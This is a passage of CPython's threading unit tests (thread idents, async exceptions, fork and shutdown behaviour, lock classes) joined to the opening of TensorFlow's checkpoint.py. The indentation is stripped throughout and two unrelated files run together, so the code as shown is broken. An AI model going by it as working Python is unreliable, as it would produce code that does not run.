self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
with self.assertWarnsRegex(PendingDeprecationWarning, 'use is_alive()'):
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
@requires_type_collecting
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
        self.assertFalse(tstate_lock.acquire(timeout=0))
        finish.release()
        # When the thread ends, the tstate lock can be successfully
        # acquired.
        self.assertTrue(tstate_lock.acquire(timeout=5))
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
        # function is set up.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
            # just fork a child process and wait for it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
        self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
        # Running interrupt_main() in a subthread should raise
        # KeyboardInterrupt in the main thread upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
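        # The join() above may be the call interrupted by KeyboardInterrupt;
        # join again to make sure the thread is cleaned up.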
t.join()
def test_interrupt_main_mainthread(self):
        # Make sure that if interrupt_main is called in the main thread,
        # KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
if __name__ == "__main__":
unittest.main()
|
checkpoint.py
|
"""Utilities for saving/loading Trackable objects."""
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import abc
import collections
import functools
import glob
import os
import threading
import time
import weakref
import six
from tensorflow.core.protobuf import trackable_object_graph_pb2
from tensorflow.python.checkpoint import checkpoint_management
from tensorflow.python.checkpoint import checkpoint_options
from tensorflow.python.checkpoint import functional_saver
from tensorflow.python.checkpoint import graph_view as graph_view_lib
from tensorflow.python.checkpoint import util
from tensorflow.python.client import session as session_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import executor
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_io_ops as io_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import utils_impl
from tensorflow.python.saved_model.pywrap_saved_model import metrics
from tensorflow.python.trackable import autotrackable
from tensorflow.python.trackable import base
from tensorflow.python.trackable import data_structures
from tensorflow.python.training import py_checkpoint_reader
from tensorflow.python.training import saver as v1_saver_lib
from tensorflow.python.training.saving import saveable_object_util
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import object_identity
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
# The callable that provides the Keras default session needed for saving.
_SESSION_PROVIDER = None
# Captures the timestamp of the first Checkpoint instantiation or the end of
# the most recent write operation. Can be accessed by multiple Checkpoint
# instances.
_END_TIME_OF_LAST_WRITE = None
_END_TIME_OF_LAST_WRITE_LOCK = threading.Lock()
# API labels for cell names used in checkpoint metrics.
_CHECKPOINT_V1 = "checkpoint_v1"
_CHECKPOINT_V2 = "checkpoint_v2"
# Async thread used for asynchronous checkpoint.
_ASYNC_CHECKPOINT_THREAD = None
def _get_duration_microseconds(start_time_seconds, end_time_seconds):
if end_time_seconds < start_time_seconds:
# Avoid returning negative value in case of clock skew.
return 0
return round((end_time_seconds - start_time_seconds) * 1000000)
@tf_export("__internal__.tracking.register_session_provider", v1=[])
def register_session_provider(session_provider):
global _SESSION_PROVIDER
# TODO(scottzhu): Change it back to only allow one time setting for session
# provider once we finished the keras repo split.
# if _SESSION_PROVIDER is None:
_SESSION_PROVIDER = session_provider
def get_session():
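  """Returns a session for saving, preferring TF's default session."""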
# Prefer TF's default session since get_session from Keras has side-effects.
session = ops.get_default_session()
if session is None:
global _SESSION_PROVIDER
